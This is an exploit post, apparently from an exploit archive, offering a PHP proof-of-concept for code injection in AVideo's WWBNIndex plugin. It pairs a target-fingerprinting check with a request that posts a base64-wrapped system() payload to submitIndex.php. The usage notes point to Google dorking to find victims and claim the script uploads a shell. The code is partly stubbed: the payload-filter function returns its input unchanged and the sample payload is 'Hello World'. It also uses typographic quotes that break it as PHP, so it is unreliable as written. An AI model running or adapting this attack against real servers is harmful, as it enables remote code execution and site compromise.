AVideo 12.4 Code Injection

=============================================================================================================================================
| # Title : AVideo 12.4 php code injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |
| # Vendor : https://github.com/WWBN/AVideo/tree/master |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following php code Upload shell file from external link.

[+] Line 114 set your target.

[+] Line 115 set your commands.

[+] save code as poc.php .

[+] USage : cmd = php poc.php .

[+] PayLoad :

<?php
class indoushka
{
private $target_uri;
private $payload;

public function __construct($target_uri, $payload)
{
$this->target_uri = $target_uri;
$this->payload = $payload;
}

public function exploit()
{
// إعداد الحمولة
$php_code = “<?php ” . ($this->isArchPHP() ? $this->payload : “system(base64_decode(‘” . base64_encode($this->payload) . “‘));”) . ” ?>”;
$filter_payload = $this->generatePhpFilterPayload($php_code);

// إرسال الطلب
$data = http_build_query([‘systemRootPath’ => $filter_payload]);
$response = $this->sendRequest(‘POST’, ‘/plugin/WWBNIndex/submitIndex.php’, $data);

if ($response[‘code’] !== 200) {
echo “Server returned ” . $response[‘code’] . “. Successful exploit attempts should not return a response.\n”;
}
}

public function check()
{
$response = $this->sendRequest(‘GET’, ‘/index.php’);
if (!$response) {
return ‘Failed to connect to the target.’;
}

if ($response[‘code’] !== 200) {
return “Unexpected HTTP response code: ” . $response[‘code’];
}

preg_match(‘/Powered by AVideo ® Platform v([\d.]+)/’, $response[‘body’], $version_match);
preg_match(‘/<!–.*?v:([\d.]+).*?–>/m’, $response[‘body’], $version_match);
if (empty($version_match[1])) {
return ‘Unable to extract AVideo version.’;
}

$version = $version_match[1];
$plugin_check = $this->sendRequest(‘GET’, ‘/plugin/WWBNIndex/submitIndex.php’);
if ($plugin_check[‘code’] !== 200) {
return ‘Vulnerable plugin WWBNIndex was not detected’;
}

if (version_compare($version, ‘12.4’) >= 0 && version_compare($version, ‘14.2’) <= 0) {
return “Detected vulnerable AVideo version: {$version}, with vulnerable plugin WWBNIndex running.”;
}

return “Detected non-vulnerable AVideo version: {$version}”;
}

private function sendRequest($method, $uri, $data = null)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $this->target_uri . $uri);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);

if ($method === ‘POST’) {
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
}

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

return [‘code’ => $http_code, ‘body’ => $response];
}

private function isArchPHP()
{
// افترض أن الحمولة عبارة عن كود PHP
return true; // أو تحقق من ذلك بناءً على شروط معينة
}

private function generatePhpFilterPayload($php_code)
{
// يجب أن تضيف هنا منطق إعداد الحمولة (تصفية)
return $php_code; // قم بتعديل ذلك بناءً على متطلباتك
}
}

// مثال على كيفية الاستخدام:
$target_uri = “http://target-url.com”; // أدخل عنوان الهدف هنا
$payload = “<?php echo ‘Hello World!’; ?>”; // الحمولة المراد استخدامها
$indoushka = new indoushka($target_uri, $payload);
$check_result = $indoushka->check();
echo $check_result . “\n”;
$indoushka->exploit();
?>

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================